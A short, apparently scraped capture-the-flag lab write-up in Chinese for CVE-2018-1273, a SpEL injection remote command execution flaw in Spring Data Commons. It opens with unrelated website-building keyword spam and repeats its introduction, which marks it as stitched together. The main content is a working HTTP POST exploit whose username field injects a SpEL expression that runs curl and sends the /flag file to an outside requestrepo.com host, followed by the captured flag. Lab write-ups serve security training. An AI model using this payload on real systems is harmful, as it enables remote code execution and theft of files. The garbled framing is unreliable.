张家界酒店网站建设,杭州建设项目审批网站,贴吧怎么做网站视频,网站运营解决方案春秋云镜 CVE-2018-1273 Spring-data-commons 远程命令执行漏洞
靶标介绍
Spring Data是一个用于简化数据库访问#xff0c;并支持云服务的开源框架#xff0c;Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中…春秋云镜 CVE-2018-1273 Spring-data-commons 远程命令执行漏洞
靶标介绍
Spring Data是一个用于简化数据库访问并支持云服务的开源框架Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中存在一处SpEL表达式注入漏洞攻击者可以注入恶意SpEL表达式以执行任意命令。
启动场景 漏洞利用
exp
POST /users?pagesize5 HTTP/1.1username[#this.getClass().forName(java.lang.Runtime).getRuntime().exec(curl -X POST --data /flag http://qc5xdbn2.requestrepo.com)]passwordrepeatedPassword1得到flag flag{07f562e8-a796-49b7-be48-a022c5cf44a1}
